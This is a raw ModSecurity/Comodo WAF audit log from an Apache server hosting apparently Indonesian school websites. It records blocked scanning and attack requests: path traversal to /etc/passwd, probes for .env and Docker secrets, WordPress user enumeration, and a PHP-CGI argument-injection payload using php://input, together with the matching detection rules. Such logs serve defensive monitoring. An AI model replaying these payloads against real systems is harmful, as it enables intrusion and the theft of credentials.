X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e3426c41-E-- --e3426c41-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /fileviewer?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891170874366 2218 (- - -) Stopwatch2: 1749891170874366 2218; combined=586, p1=432, p2=123, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3426c41-Z-- --2546402a-A-- [14/Jun/2025:15:52:52 +0700] aE04ZGmwZ6YUkjOdtI7-jAAAABE 103.236.140.4 35272 103.236.140.4 8181 --2546402a-B-- GET /admin/download.cgi?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373814 --2546402a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2546402a-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:file. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:file: ../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891172753824 2576 (- - -) Stopwatch2: 1749891172753824 2576; combined=818, p1=468, p2=320, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2546402a-Z-- --09f9d74a-A-- [14/Jun/2025:15:52:54 +0700] aE04ZkMWfhkd5Y0sFtog9AAAAJY 103.236.140.4 35302 103.236.140.4 8181 --09f9d74a-B-- GET /api/v1/resources?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676827 --09f9d74a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09f9d74a-E-- --09f9d74a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/v1/resources?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891174339434 2190 (- - -) Stopwatch2: 1749891174339434 2190; combined=597, p1=454, p2=112, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09f9d74a-Z-- --742e2447-A-- [14/Jun/2025:15:52:58 +0700] aE04al3g_boun6Rx5jIBygAAANE 103.236.140.4 35378 103.236.140.4 8181 --742e2447-B-- GET /download?file=../../../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676860 --742e2447-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --742e2447-E-- --742e2447-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download?file=../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891178573567 2149 (- - -) Stopwatch2: 1749891178573567 2149; combined=688, p1=439, p2=210, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --742e2447-Z-- --ec365c7b-A-- [14/Jun/2025:15:53:05 +0700] aE04cV3g_boun6Rx5jIB2AAAANA 103.236.140.4 35484 103.236.140.4 8181 --ec365c7b-B-- GET /media/download?file=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676902 --ec365c7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ec365c7b-E-- --ec365c7b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /media/download?file=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891185111495 2107 (- - -) Stopwatch2: 1749891185111495 2107; combined=452, p1=341, p2=88, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec365c7b-Z-- --bf79454f-A-- [14/Jun/2025:15:53:07 +0700] aE04c13g_boun6Rx5jIB4QAAAMQ 103.236.140.4 35522 103.236.140.4 8181 --bf79454f-B-- GET /report?file=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373919 --bf79454f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf79454f-E-- --bf79454f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /report?file=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891187039288 1897 (- - -) Stopwatch2: 1749891187039288 1897; combined=576, p1=431, p2=115, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf79454f-Z-- --5252057c-A-- [14/Jun/2025:15:53:11 +0700] aE04d2IDXuKmWNi2UBTndgAAAFE 103.236.140.4 35606 103.236.140.4 8181 --5252057c-B-- GET /file.php?f=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373955 --5252057c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5252057c-E-- --5252057c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /file.php?f=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749891191571205 2188 (- - -) Stopwatch2: 1749891191571205 2188; combined=550, p1=417, p2=106, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5252057c-Z-- --4c419279-A-- [14/Jun/2025:15:53:59 +0700] aE04p13g_boun6Rx5jICeAAAANQ 103.236.140.4 36630 103.236.140.4 8181 --4c419279-B-- GET /volumes/download?file=../../../../../../var/lib/docker/volumes/app_data/_data/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180374384 --4c419279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4c419279-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891239967855 819 (- - -) Stopwatch2: 1749891239967855 819; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c419279-Z-- --553a1871-A-- [14/Jun/2025:15:54:02 +0700] aE04ql3g_boun6Rx5jIChgAAANg 103.236.140.4 36686 103.236.140.4 8181 --553a1871-B-- GET /volumes/download?file=../../../../../../var/lib/docker/volumes/app_data/_data/config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174677408 --553a1871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --553a1871-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891242161081 824 (- - -) Stopwatch2: 1749891242161081 824; combined=339, p1=293, p2=0, p3=0, p4=0, p5=46, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --553a1871-Z-- --c0f22976-A-- [14/Jun/2025:15:56:03 +0700] aE05I13g_boun6Rx5jIDNgAAAM8 103.236.140.4 39572 103.236.140.4 8181 --c0f22976-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept-Charset: utf-8 --c0f22976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0f22976-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891363804037 774 (- - -) Stopwatch2: 1749891363804037 774; combined=329, p1=288, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0f22976-Z-- --562ee337-A-- [14/Jun/2025:15:59:39 +0700] aE05-2IDXuKmWNi2UBTpeAAAAEE 103.236.140.4 44502 103.236.140.4 8181 --562ee337-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Accept-Charset: utf-8 --562ee337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --562ee337-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891579526122 677 (- - -) Stopwatch2: 1749891579526122 677; combined=285, p1=245, p2=0, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --562ee337-Z-- --56888b21-A-- [14/Jun/2025:16:00:20 +0700] aE06JF3g_boun6Rx5jIElwAAANE 103.236.140.4 45460 103.236.140.4 8181 --56888b21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.254.98.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.254.98.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --56888b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56888b21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891620743379 2747 (- - -) Stopwatch2: 1749891620743379 2747; combined=1449, p1=515, p2=898, p3=0, p4=0, p5=35, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56888b21-Z-- --aa8a4239-A-- [14/Jun/2025:17:04:50 +0700] aE1JQmIDXuKmWNi2UBTw3wAAAEg 103.236.140.4 51596 103.236.140.4 8181 --aa8a4239-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --aa8a4239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa8a4239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749895490087105 925 (- - -) Stopwatch2: 1749895490087105 925; combined=378, p1=336, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa8a4239-Z-- --c2b98d10-A-- [14/Jun/2025:17:08:21 +0700] aE1KFWmwZ6YUkjOdtI4MAwAAAAY 103.236.140.4 51604 103.236.140.4 8181 --c2b98d10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.181.166.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.181.166.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2b98d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2b98d10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749895701729703 2990 (- - -) Stopwatch2: 1749895701729703 2990; combined=1281, p1=453, p2=793, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2b98d10-Z-- --1f02744c-A-- [14/Jun/2025:17:43:48 +0700] aE1SZGIDXuKmWNi2UBTw8AAAAFM 103.236.140.4 51730 103.236.140.4 8181 --1f02744c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.99.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.99.87 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1f02744c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f02744c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749897828734055 885 (- - -) Stopwatch2: 1749897828734055 885; combined=379, p1=337, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f02744c-Z-- --6c559e07-A-- [14/Jun/2025:20:08:55 +0700] aE10Z2mwZ6YUkjOdtI4MSgAAAA0 103.236.140.4 52342 103.236.140.4 8181 --6c559e07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.150.168.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.150.168.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6c559e07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c559e07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749906535216943 2748 (- - -) Stopwatch2: 1749906535216943 2748; combined=1226, p1=428, p2=769, p3=0, p4=0, p5=29, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c559e07-Z-- --2af7aa6b-A-- [14/Jun/2025:20:16:56 +0700] aE12SGmwZ6YUkjOdtI4MUQAAAAM 103.236.140.4 52376 103.236.140.4 8181 --2af7aa6b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --2af7aa6b-C-- --2af7aa6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2af7aa6b-E-- --2af7aa6b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749907016122612 3683 (- - -) Stopwatch2: 1749907016122612 3683; combined=2126, p1=408, p2=1692, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2af7aa6b-Z-- --f4c1fb15-A-- [14/Jun/2025:20:43:48 +0700] aE18lGIDXuKmWNi2UBTxPgAAAEo 103.236.140.4 52526 103.236.140.4 8181 --f4c1fb15-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 128.199.89.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 128.199.89.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f4c1fb15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4c1fb15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] 